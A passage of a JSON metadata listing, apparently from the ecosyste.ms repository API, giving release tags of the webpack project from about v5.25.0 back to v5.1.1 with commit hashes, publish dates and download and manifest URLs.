bpack/webpack/releases/tag/v5.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.25.0/manifests"},{"name":"v5.24.4","sha":"ef5e68141dc0fb6d02aa022194506cda878392c1","kind":"tag","published_at":"2021-03-08T09:56:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.24.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.24.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.24.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.4/manifests"},{"name":"v5.24.3","sha":"d044c857305fb48693bfa961bec3485d82ddef41","kind":"tag","published_at":"2021-03-03T19:07:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.24.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.24.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.24.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.3/manifests"},{"name":"v5.24.2","sha":"04a7d052b5c04628257ec23244f234622c7f394c","kind":"tag","published_at":"2021-02-24T20:20:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.24.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.24.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.24.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.2/manifests"},{"name":"v5.24.1","sha":"3849f45961c60d4bea91b4ef43bb7da7992a0c3a","kind":"tag","published_at":"2021-02-23T21:56:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.24.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.24.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.24.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.1/manifests"},{"name":"v5.24.0","sha":"63c14ccbfc6698cb974f8469e0a829ae1d8f44ec","kind":"tag","published_at":"2021-02-22T22:32:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.24.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.0/manifests"},{"name":"v5.23.0","sha":"7774d7ec632e66b8c6a8c0f320b3469e86ed5e26","kind":"tag","published_at":"2021-02-18T15:52:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.23.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.23.0/manifests"},{"name":"v5.22.0","sha":"f5bcac4a061897822bf10a8191231b5a71c59273","kind":"tag","published_at":"2021-02-15T09:00:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.22.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.22.0/manifests"},{"name":"v5.21.2","sha":"6661bd94fd724bb4610d348a1ffe48030dc56726","kind":"tag","published_at":"2021-02-07T18:27:14.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.21.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.21.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.21.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.2/manifests"},{"name":"v5.21.1","sha":"a1948fb2247adb5121ded5c3c4a04ed384b96c03","kind":"tag","published_at":"2021-02-06T09:39:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.21.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.21.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.21.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.1/manifests"},{"name":"v5.21.0","sha":"647aa17cc7fe16d382b3d48efc47258c4e96d699","kind":"tag","published_at":"2021-02-05T21:03:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.21.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.0/manifests"},{"name":"v5.20.2","sha":"f5a263750611f33adffb7644064b40b0432d6c65","kind":"tag","published_at":"2021-02-04T14:26:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.20.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.20.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.20.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.2/manifests"},{"name":"v5.20.1","sha":"82edd9150f8e54bab1497c9c29edc01bc39a88b4","kind":"tag","published_at":"2021-02-03T12:34:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.20.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.20.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.20.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.1/manifests"},{"name":"v5.20.0","sha":"181e045499c44c9855da56ce38ee5fecbe2998d2","kind":"tag","published_at":"2021-02-02T20:21:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.20.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.0/manifests"},{"name":"v5.19.0","sha":"3f7573c83ce53a486eff1439ba6fa9143ddbbf0b","kind":"tag","published_at":"2021-01-29T19:01:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.19.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.19.0/manifests"},{"name":"v5.18.0","sha":"16774961d4f9371251c96adf98618675eb032f30","kind":"tag","published_at":"2021-01-26T19:52:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.18.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.18.0/manifests"},{"name":"v5.17.0","sha":"d02e8daa267ca094fc0a030a595b000d35a99493","kind":"tag","published_at":"2021-01-22T14:01:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.17.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.17.0/manifests"},{"name":"v5.16.0","sha":"56246f0833333a8e277386b16408d8a3eeff553e","kind":"tag","published_at":"2021-01-19T18:39:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.16.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.16.0/manifests"},{"name":"v5.15.0","sha":"0a8bf41f169c53c0819f0f320db5957017ac58de","kind":"tag","published_at":"2021-01-15T15:53:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.15.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.15.0/manifests"},{"name":"v5.14.0","sha":"f87cafe91c251863cc3dc84ce81b60445f2a780d","kind":"tag","published_at":"2021-01-13T23:52:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.14.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.14.0/manifests"},{"name":"v5.13.0","sha":"a694cdfb82b5fd0a5c52102083a267a36446e03e","kind":"tag","published_at":"2021-01-11T22:30:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.13.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.13.0/manifests"},{"name":"v4.46.0","sha":"444e59f8a427f94f0064cae6765e5a3c4b78596d","kind":"tag","published_at":"2021-01-11T13:42:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.46.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.46.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.46.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.46.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.46.0/manifests"},{"name":"v5.12.3","sha":"a064b0ff3315db0d95124aaf5cc9b0a6add82926","kind":"tag","published_at":"2021-01-10T18:23:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.12.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.12.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.12.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.3/manifests"},{"name":"v5.12.2","sha":"88610d738ff78fa3fb7f859ee284c632bca42a24","kind":"tag","published_at":"2021-01-09T08:27:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.12.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.12.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.2/manifests"},{"name":"v5.12.1","sha":"62ec1546260d168cffd5dec8fc397c6e1159e4e4","kind":"tag","published_at":"2021-01-08T15:29:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.12.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.1/manifests"},{"name":"v5.12.0","sha":"74c9c72b873b27ec552cd6b85a9b578d6698e102","kind":"tag","published_at":"2021-01-08T12:58:13.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.12.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.0/manifests"},{"name":"v4.45.0","sha":"03313223fd4a0d4e570b8c79971e61b28cb3aeae","kind":"tag","published_at":"2021-01-08T12:53:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.45.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.45.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.45.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.45.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.45.0/manifests"},{"name":"v5.11.1","sha":"98bcf44a43d0109ac2680487fddf3c3262395e1f","kind":"tag","published_at":"2020-12-28T18:06:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.11.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.11.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.11.1/manifests"},{"name":"v5.11.0","sha":"f04328bad933fd9bacea389df17db96ffbd2336b","kind":"tag","published_at":"2020-12-17T15:59:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.11.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.11.0/manifests"},{"name":"v5.10.3","sha":"10ad4e95b850bbe20019275fd1d364666c4b69ea","kind":"tag","published_at":"2020-12-15T20:00:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.10.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.3/manifests"},{"name":"v5.10.2","sha":"c937292e6fb2e1e0a618d9d633f4184ec64cda75","kind":"tag","published_at":"2020-12-15T08:08:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.10.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.2/manifests"},{"name":"v5.10.1","sha":"3f3d0138f9c18658be87d89d609fc7c6d286005f","kind":"tag","published_at":"2020-12-11T20:32:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.10.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.1/manifests"},{"name":"v5.10.0","sha":"06e1cce1221ca717fc8efbaeca5ca71246f85a44","kind":"tag","published_at":"2020-12-04T19:26:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.10.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.0/manifests"},{"name":"v5.9.0","sha":"0e7437dc3042874649919d4ffe005db13053c4ff","kind":"tag","published_at":"2020-11-28T21:51:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.9.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.9.0/manifests"},{"name":"v5.8.0","sha":"fb7d09b315bbf3b5388eed0cc5e58309187a3acc","kind":"tag","published_at":"2020-11-26T17:58:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.8.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.8.0/manifests"},{"name":"v5.7.0","sha":"4ba6d2ea67e9046cbba83f588989b3cadff7d911","kind":"tag","published_at":"2020-11-26T06:08:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.7.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.7.0/manifests"},{"name":"v5.6.0","sha":"1936615458352f38ff517d258b936d690a7b631f","kind":"tag","published_at":"2020-11-19T12:18:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.6.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.6.0/manifests"},{"name":"v5.5.1","sha":"a6ebce41059a029163a1774b35d81e0bfaa05b27","kind":"tag","published_at":"2020-11-18T12:39:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.5.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.5.1/manifests"},{"name":"v5.5.0","sha":"3471c776059ac2d26593ea39f9c47c1874253dbb","kind":"tag","published_at":"2020-11-17T13:23:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.5.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.5.0/manifests"},{"name":"v5.4.0","sha":"84dafd164499b6080243cf9d00537b47b6e075c2","kind":"tag","published_at":"2020-11-03T15:28:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.4.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.4.0/manifests"},{"name":"v5.3.2","sha":"3df96f4a7843ef07794c31da8c7469dff133a228","kind":"tag","published_at":"2020-10-29T19:52:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.3.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.2/manifests"},{"name":"v5.3.1","sha":"dfae6f0ac70e1f4ec6d25a853838d4aa58e10e1f","kind":"tag","published_at":"2020-10-28T21:07:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.3.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.1/manifests"},{"name":"v5.3.0","sha":"ab555844701209492debf23cc3168a0efafb3251","kind":"tag","published_at":"2020-10-27T11:52:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.3.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.0/manifests"},{"name":"v5.2.1","sha":"d09357b4008da750e0d90066b2cd9567edc27a61","kind":"tag","published_at":"2020-10-27T11:02:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.2.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.2.1/manifests"},{"name":"v5.2.0","sha":"d42705c05dd62d562b759fb518f86c9854435df4","kind":"tag","published_at":"2020-10-22T16:59:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.2.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.2.0/manifests"},{"name":"v5.1.3","sha":"c90dfadbc6c5ac1ab4bda2cc106958b65fb5e6e7","kind":"tag","published_at":"2020-10-16T13:36:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.1.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.3/manifests"},{"name":"v5.1.2","sha":"83790375529c5b2967d45ed40700399e107d478f","kind":"tag","published_at":"2020-10-15T18:41:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.1.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.2/manifests"},{"name":"v5.1.1","sha":"f2f998b58362d5edc9945a48f8245a3347ad007c","kind":"tag","published_at":"2020-10-15T13:08:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.1.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webp